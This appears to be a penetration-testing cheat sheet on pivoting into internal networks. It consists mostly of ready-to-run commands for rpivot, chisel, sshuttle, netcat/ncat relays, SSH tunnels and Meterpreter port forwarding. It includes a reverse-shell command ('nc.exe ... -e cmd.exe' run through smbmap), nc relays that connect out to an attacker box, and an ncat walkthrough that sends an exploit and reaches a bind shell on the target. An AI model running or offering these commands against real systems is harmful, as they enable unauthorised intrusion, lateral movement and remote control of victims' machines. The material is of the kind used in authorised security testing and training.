Pivoting
rpivot
https://github.com/klsecservices/rpivot
Start server listener on port 9999, which creates a socks 4 proxy on 127.0.0.1:1080 upon connection from client:
1 2 |
python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080 |
Connect to Server:
1 2 |
python client.py --server-ip 10.1.1.1 --server-port 9999 |
Using single zip file mode:
1 2 3 4 |
zip rpivot.zip -r *.py ./ntlm_auth/ python rpivot.zip server <server_options> python rpivot.zip client <client_options> |
Use proxychains to launch tools through the tunnel
1 2 |
proxychains smbmap -u 'user2' -p 'passwd' -d WORKGROUP -H 10.11.x.49 -x 'C:\Windows\Tasks\nc.exe 10.11.0.30 1234 -e cmd.exe' |
Set following in /etc/proxychains.conf socks4 127.0.0.1 1080
Example:
On Attack box:
1 2 |
python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080 |
On Victim:
1 2 |
./client --server-ip 10.xx.0.30 --server-port 9999 |
sshuttle
1 2 |
sshuttle -r root@10.1.1.1 10.2.2.0/24 |
Chisel
git clone https://github.com/jpillora/chisel.git
go build
From Kali:
1 2 |
./chisel_linux_386 client 10.xx.xx.49:60001 8088:10.xx.1.223:80 |
From Victim:
1 2 |
chisel_windows_386.exe server -p 60001 |
nc
Bind method:
On the DMZ / target Box, we run a simple listener to client relay:
1 2 |
nc -l -p 1521 -e “nc internal.db.srv 1521” |
Now, if the attacker connects to port 1521 of the DMZ Box, his connection will infact be routed to port 1521 of the internal server running Oracle. Hence interaction with the db is possible which was previously inaccessible.
Reverse method:
This time we’ll use listener to listener and client to client relays in netcat to Reverse Connect to attacker’s box. This method comprises of two parts –
a) Establish a client to client relay on the DMZ box that connects to both the attacker’s box on port 80 and the internal.db.srv box on port 1521.
b) Establish a listener to listener relay that binds to both port 80 and port 1521 on the attacker’s box. Steps (must be done in the following order)-
- On the attacker’s Linux Box, we run a listener to listener relay,
1 2 |
nc -l -p 80 -e “nc -l -p 1521” |
2.While on the DMZ Box, we run a client to client relay,
1 2 |
nc attacker.box 80 -e “nc internal.db.srv 1521” |
netcat
Reverse On our attacking machine, we setup a listener-to-listener relay using the following command:
1 2 |
ncat -lv --broker -m2 10000 |
At this point, we’ll have port 10000 listening on our machine. On the web server we execute the following command:
1 2 |
ncat -v 192.168.81.125 10000 -c "ncat -v 192.168.63.142 10000" |
Ncat: Version 5.51
Ncat: Connected to 192.168.81.125:10000.
Ncat: Version 5.51
Ncat: Connected to 192.168.63.142:10000.
This tells ncat to connect to our ncat instance listening on port 10000, and then to connect to port 10000 on the target. This completes the setup, and data from our machine will flow through the web server and to the target. Note that the syntax for executing the client-to-client relay on the pivot is the same, regardless of whether it’s a Linux, Windows, or OS X machine. There’s nothing else that needs to be done, such as creating a pipe. Compare it to the technique that uses traditional netcat to see the difference. We can now execute our exploit. Keep in mind that we need to send it to port 10000 on our machine:
./exploit.py 127.0.0.1 10000
[+] sending payload of length 1479 [+] done
Bind
With the exploit sent, we can now terminate the ncat relays. Assuming the exploit worked, a bind shell should be listening on 4444 on the target. In order to access it, we once again setup ncat relays, only this time we’ll specify port 4444. On our machine we run the following command:
1 2 |
ncat -lv --broker -m2 4444 |
On the web server, we setup the client-to-client relay:
1 2 |
ncat -v 192.168.81.125 4444 -c "ncat -v 192.168.63.142 4444" |
Ncat: Version 5.51
Ncat: Connected to 192.168.81.125:4444.
Ncat: Version 5.51
Ncat: Connected to 192.168.63.142:4444.
Using netcat (or ncat), we can connect to port 4444 on our machine to get a remote shell on the target:
1 2 |
nc -v 127.0.0.1 4444 |
SSH
Reverse SSH Tunneling
1 2 |
ssh -R 3388:localhost:3389 -p SSH-PORT user@sshserver |
Local SSH Tunneling
1 2 |
ssh -L 4443:10.0.0.4:443 -p SSH-PORT user@sshserver |
Connect to https://localhost:4443
SSH as a SOCKS Proxy
1 2 |
ssh -D 8888 user@ssh-server |
Set your web browser to use localhost on port 8888 as SOCKS Proxy, and all your HTTP/HTTPS requests will go through the SSH tunnel. Or use Proxychains to execute tools over the Proxy connection.
Metasploit Meterpreter
Create portforwarding via Meterpreter session.
1 2 |
portfwd add -l 3333 -p 80 -r TargetIP |
Create socks proxy via Meterpreter, then use Proxychains to run tools through the tunnel to target.
1 2 |
use auxiliary/server/socks4a |